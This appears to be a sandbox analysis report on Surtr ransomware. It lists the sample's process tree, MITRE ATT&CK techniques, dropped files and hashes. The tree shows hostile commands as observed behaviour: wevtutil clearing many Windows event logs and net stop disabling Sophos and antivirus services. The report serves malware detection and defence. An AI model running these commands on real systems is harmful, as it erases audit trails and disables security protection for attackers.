      PID:1764
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
      4⤵
      PID:920
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
      4⤵
      PID:1928
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
      4⤵
      PID:1724
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
      4⤵
      PID:1824
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
      4⤵
      PID:844
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
      4⤵
      PID:1916
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
      4⤵
      PID:1504
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
      4⤵
      PID:1140
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
      4⤵
      PID:824
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
      4⤵
      Clears Windows event logs
      PID:1476
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
      4⤵
      PID:1168
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
      4⤵
      PID:1356
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
      4⤵
      PID:336
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
      4⤵
      Clears Windows event logs
      PID:228
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
      4⤵
      PID:1088
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
      4⤵
      PID:2016
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
      4⤵
      PID:1956
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
      4⤵
      PID:1492
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
      4⤵
      PID:1092
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
      4⤵
      PID:856
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
      4⤵
      PID:816
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
      4⤵
      PID:672
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
      4⤵
      PID:1576
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
      4⤵
      PID:1464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:1552
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
      4⤵
      PID:900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
      4⤵
      PID:208
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
      4⤵
      Clears Windows event logs
      PID:1392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
      4⤵
      PID:1992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
      4⤵
      PID:1056
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
      4⤵
      PID:1736
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
      4⤵
      PID:536
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
      4⤵
      Clears Windows event logs
      PID:2020
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
      4⤵
      Clears Windows event logs
      PID:1580
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
      4⤵
      Clears Windows event logs
      PID:1340
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
      4⤵
      PID:1120
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
      4⤵
      PID:1132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:156
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
      4⤵
      PID:2036
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
      4⤵
      PID:660
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
      4⤵
      PID:240
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
      4⤵
      PID:1012
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
      4⤵
      PID:232
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
      4⤵
      Clears Windows event logs
      PID:224
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
      4⤵
      PID:1352
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
      4⤵
      PID:216
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
      4⤵
      PID:1768
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
      4⤵
      PID:1752
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
      4⤵
      PID:212
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
      4⤵
      PID:1192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
      4⤵
      PID:612
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
      4⤵
      PID:1080
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
      4⤵
      PID:1464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
      4⤵
      PID:1552
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
      4⤵
      PID:900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
      4⤵
      PID:208
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
      4⤵
      PID:1392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
      4⤵
      PID:1992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
      4⤵
      PID:1056
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
      4⤵
      PID:1736
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
      4⤵
      PID:536
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
      4⤵
      PID:1580
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
      4⤵
      PID:2020
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
      4⤵
      PID:1340
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
      4⤵
      PID:1120
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
      4⤵
      PID:1132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
      4⤵
      PID:156
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
      4⤵
      PID:2036
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
      4⤵
      PID:660
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
      4⤵
      PID:240
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
      4⤵
      Clears Windows event logs
      PID:952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
      4⤵
      Clears Windows event logs
      PID:1012
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
      4⤵
      PID:232
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
      4⤵
      PID:224
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
      4⤵
      PID:1352
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
      4⤵
      PID:216
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
      4⤵
      PID:1768
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
      4⤵
      PID:1752
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
      4⤵
      PID:212
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
      4⤵
      PID:1192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
      4⤵
      Clears Windows event logs
      PID:612
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
      4⤵
      PID:1080
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
      4⤵
      PID:1464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
      4⤵
      PID:1552
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
      4⤵
      PID:900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
      4⤵
      PID:208
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
      4⤵
      PID:1392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
      4⤵
      PID:1992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
      4⤵
      PID:1056
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
      4⤵
      PID:1736
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
      4⤵
      PID:536
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
      4⤵
      PID:1556
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
      4⤵
      Clears Windows event logs
      PID:1580
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
      4⤵
      PID:1340
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
      4⤵
      PID:1120
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
      4⤵
      PID:1132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
      4⤵
      PID:156
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
      4⤵
      PID:2036
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
      4⤵
      Clears Windows event logs
      PID:660
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
      4⤵
      PID:240
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
      4⤵
      PID:952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:1012
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
      4⤵
      PID:232
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:224
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
      4⤵
      PID:1352
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
      4⤵
      PID:216
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
      4⤵
      PID:1768
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
      4⤵
      PID:1752
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
      4⤵
      PID:212
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
      4⤵
      PID:1192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
      4⤵
      PID:612
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
      4⤵
      PID:1080
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
      4⤵
      PID:1464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
      4⤵
      PID:1552
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
      4⤵
      PID:900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
      4⤵
      PID:208
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
      4⤵
      PID:1392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
      4⤵
      PID:1992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
      4⤵
      PID:1056
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
      4⤵
      PID:1736
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
      4⤵
      PID:536
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
      4⤵
      PID:1556
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
      4⤵
      PID:1580
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
      4⤵
      Clears Windows event logs
      PID:1340
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
      4⤵
      PID:1120
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
      4⤵
      PID:1132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
      4⤵
      PID:156
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"
      4⤵
      PID:2036
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
      4⤵
      PID:660
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
      4⤵
      PID:240
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
      4⤵
      PID:952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
      4⤵
      PID:1012
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
      4⤵
      PID:232
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
      4⤵
      PID:224
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
      4⤵
      PID:1352
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:216
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
      4⤵
      PID:1768
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
      4⤵
      PID:1752
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
      4⤵
      PID:212
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
      4⤵
      PID:1192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
      4⤵
      PID:612
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
      4⤵
      PID:1080
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
      4⤵
      PID:1464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
      4⤵
      Clears Windows event logs
      PID:1552
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
      4⤵
      PID:900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
      4⤵
      PID:208
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
      4⤵
      Clears Windows event logs
      PID:1392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
      4⤵
      PID:1992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
      4⤵
      PID:1056
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
      4⤵
      PID:1736
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
      4⤵
      PID:536
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
      4⤵
      PID:1556
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
      4⤵
      PID:1580
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
      4⤵
      Clears Windows event logs
      PID:1340
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
      4⤵
      PID:1120
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
      4⤵
      PID:1132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
      4⤵
      PID:156
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
      4⤵
      PID:2036

C:\Windows\system32\net.exe
net stop "Sophos Agent"
1⤵
- Suspicious use of WriteProcessMemory
PID:1812
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "Sophos Agent"
  2⤵
  PID:396

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\system32\net.exe
net stop "Antivirus"
1⤵
PID:892
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "Antivirus"
  2⤵
  PID:1956

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Hidden Files and Directories

T1158

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Filesize
8KB

MD5
bb9e1653713e09ba59650b83ab2870a9

SHA1
6c843ece9a16544a3e0111dceb9dad3d008b67d1

SHA256
3b364b3dec1f5d8b237773a1f9dd33ec52bea2f7d6fab45bdde2df8ea0224b5a

SHA512
33f51e24f5ed617f97fc4179c19e62b8d7ee53f08159eeb6c36b23084999d421379ddeabe2e109448ae06cc538c98d869ecfb828f08bcbc1541ad3f62bc3245b

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe

Download Submit
C:\ProgramData\Service\ID_DATA.surt

Download Submit
C:\ProgramData\Service\Private_DATA.surt

Download Submit
C:\ProgramData\Service\Public_DATA.surt

Download Submit
C:\ProgramData\Service\SURTR_README.hta

Download Submit
C:\ProgramData\Service\SURTR_README.txt

Download Submit
C:\ProgramData\Service\Surtr.exe

Download Submit
C:\ProgramData\Service\SurtrBackGround.jpg

Download Submit
C:\ProgramData\Service\SurtrIcon.ico

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\ID_DATA.surt

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\Private_DATA.surt

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\SURTR_README.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe

Download Submit
C:\Users\Admin\Desktop\Private_DATA.surt

Download Submit
C:\Users\Admin\Desktop\SURTR_README.hta

Download Submit
memory/1076-69-0x000007FEFC081000-0x000007FEFC083000-memory.dmp

Filesize
8KB

Download
memory/1896-58-0x0000000140000000-0x0000000140161000-memory.dmp

Filesize
1.4MB

Download
memory/1896-53-0x0000000140000000-0x0000000140161000-memory.dmp

Filesize
1.4MB

Download
memory/1896-60-0x0000000140001000-0x0000000140161000-memory.dmp

Filesize
1.4MB

Download
memory/1896-59-0x0000000140000000-0x0000000140161000-memory.dmp

Filesize
1.4MB

Download
memory/1896-57-0x0000000140000000-0x0000000140161000-memory.dmp

Filesize
1.4MB

Download
memory/1896-56-0x0000000140000000-0x0000000140161000-memory.dmp

Filesize
1.4MB

Download
memory/1896-54-0x0000000140000000-0x0000000140161000-memory.dmp

Filesize
1.4MB

Download